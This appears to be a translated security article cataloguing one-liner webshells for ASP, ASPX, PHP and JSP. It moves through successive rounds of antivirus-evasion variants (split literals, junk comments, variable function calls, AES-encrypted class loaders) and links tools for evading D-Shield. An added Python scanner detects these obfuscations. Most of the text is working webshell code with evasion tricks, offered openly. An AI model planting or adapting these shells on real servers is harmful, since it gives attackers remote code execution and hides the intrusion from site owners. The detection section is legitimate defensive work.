0x00: Introduction
One-liner webshells are short and compact, yet powerful and very hard to spot, and they have always played a major role in intrusions. They have been locked in a battle of wits with antivirus engines: a new one appears, and the AV updates its rules within seconds; the shell mutates again, and is caught again...
0x01: Narrative
1. Common one-liners
ASP:
<% eval request("pass")%>
ASPX:
<%@ Page Language="Jscript"%><%Response.Write(eval(Request.Item["z"],"unsafe"));%>
PHP:
<?php eval(@$_POST['a']); ?>
JSP:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
// executes a system command without echoing any output back
2. Simple variations
ASP:
<% eval ""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
// the connection password is -7 (0-2-5 evaluates to -7)
ASPX:
<%@ Page Language = Jscript %>
<%var /*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval/*-/*-*/(/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/);%>
// the connection password is -7 (0-2-5 evaluates to -7)
PHP:
<?php $_GET[a]($_GET[b]); ?>
JSP:
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
3. Second-round variations
ASP:
<%if request("MH")<>"" then session("MH")=request("MH"):end if:if session("MH")<>"" then execute session("MH")%>
ASPX:
<%@ Page Language="Jscript"%>
<%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format("{0:yyyyMMdd}",DateTime.Now.ToUniversalTime())+"37E4DD20C310142564FC483DB1132F36","MD5").ToUpper()],"unsafe");%>
// the connection password changes with the date
PHP:
<?php ($_=@$_GET[2]).@$_($_POST[1])?>
JSP:
<%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
4. Third-round variations
ASPX:
<%@Page Language="C#" %>
<%@Import namespace="System.Reflection"%>
<%if (Request["pass"]!=null){ Session.Add("k", Guid.NewGuid().ToString().Replace("-", "").Substring(16)); Response.Write(Session[0]); return;}byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>
// the one-liner shipped with AntSword (蚁剑)
PHP:
<?php session_start();isset($_GET['pass'])?print $_SESSION['k']=substr(md5(uniqid(rand())),16):($b=explode('|',openssl_decrypt(file_get_contents("php://input"), "AES128", $_SESSION['k'])))&call_user_func($b[0],$b[1]);?>
// the one-liner shipped with AntSword (蚁剑)
JSP:
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>
<%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
// the one-liner shipped with AntSword (蚁剑)
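Every variation in sections 2 to 4 above works the same way: the sink (eval, execute, exec, a class loader, a file write) and the request-controlled source are still there, but the token an AV rule would look for is split into one-character literals, interleaved with junk comments, or replaced by a variable function call. The scanner below is an added example written for this article (not the author's code, nor part of any of the linked projects): it normalises a sample by stripping block comments and folding concatenated literals back together, then looks for a sink/source pair. The sample strings are constructed, shortened from the variants quoted above, and the sink and source tables are my own choice of names.

```python
import re

# Sinks (code/command execution, class loading, file write) and request-controlled
# sources seen in the four stacks above. Matched case-insensitively on normalised text.
SINKS = {"eval": r"\beval\b", "execute": r"\bexecute\b", "exec": r"\.exec\(",
         "FileOutputStream": r"fileoutputstream\(", "Assembly.Load": r"assembly\.load\(",
         "defineClass": r"defineclass\(", "call_user_func": r"call_user_func\b"}
SOURCES = {"request": r"\brequest\b", "$_GET": r"\$_get\b", "$_POST": r"\$_post\b",
           "php://input": r"php://input", "session": r"session"}
# A literal signature of the kind the article says AV rules start from.
NAIVE = re.compile(r"eval\s*\(?\s*request", re.I)
# PHP "variable function" call: $_GET[a]($_GET[b]) carries no fixed sink name at all.
VAR_CALL = re.compile(r"\$_(?:get|post|request)\[[^\]]*\]\s*\(", re.I)
JOIN = re.compile(r'"([^"\\]*)"\s*[+&.]\s*"([^"\\]*)"')   # "a"+"b", "a"&"b", "a"."b"

def normalize(src: str) -> str:
    """Undo the splitting tricks: strip /*-/*-*/ block comments, fold runs of
    concatenated literals into one, and drop the quotes so the rebuilt token is visible."""
    s = re.sub(r"/\*.*?\*/", "", src, flags=re.S)
    s = re.sub(r"\s+", " ", s)
    prev = None
    while prev != s:                       # repeat until no adjacent literals remain
        prev, s = s, JOIN.sub(r'"\1\2"', s)
    return s.replace('"', "").lower()

def concat_chars(src: str) -> int:
    """Count one-character literals glued to a following literal; a long run is an
    obfuscation indicator on its own, whatever it reassembles to."""
    return len(re.findall(r'"[^"]"\s*[+&.]\s*(?=")', src))

def naive_match(src: str) -> bool:
    return bool(NAIVE.search(src))

def scan(src: str) -> dict:
    norm = normalize(src)
    sinks = [n for n, p in SINKS.items() if re.search(p, norm)]
    sources = [n for n, p in SOURCES.items() if re.search(p, norm)]
    var_call = bool(VAR_CALL.search(src))
    chars = concat_chars(src)
    return {"suspicious": (bool(sinks) and bool(sources)) or var_call or chars >= 4,
            "sinks": sinks, "sources": sources, "var_call": var_call, "concat_chars": chars}

# Constructed samples, shortened from the variants quoted in the article.
SAMPLES = {
    "asp_plain": '<% eval request("pass")%>',
    "asp_split": '<% eval ""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&")"&")")%>',
    "aspx_comments": '<% var /*-/*-*/P/*-/*-*/=/*-/*-*/"R"+"e"+/*-/*-*/"q"+"u"+"e"+"s"+"t"; eval(P,"unsafe");%>',
    "php_varfunc": '<?php $_GET[a]($_GET[b]); ?>',
    "asp_session": '<%if session("MH")<>"" then execute session("MH")%>',
    "jsp_exec": '<%Runtime.getRuntime().exec(request.getParameter("i"));%>',
    "benign": '<% Response.Write("hello") %>',
}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print(f"{name:14} naive={naive_match(src)!s:5} {scan(src)}")
```

Run as-is, only the plain ASP sample trips the literal signature, while every variant is flagged after normalisation and the benign line is not; the heuristics are deliberately loose, so treat hits as candidates for review rather than verdicts.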
5. Fourth-round variations
1. Using random XOR for unlimited evasion of D盾 (D-Shield), AntSword edition:
Project: https://github.com/yzddmr6/as_webshell_venom
2. A new kind of one-liner webshell built on dynamic binary encryption:
Article: https://xz.aliyun.com/t/2799
0x02: Afterword
There are many ways to mutate a one-liner webshell; the examples in this article are only a few of them. All these strange and ever-changing variations exist to dodge antivirus detection, and the antivirus vendors keep updating their rule bases in turn. Both sides grow stronger through this contest.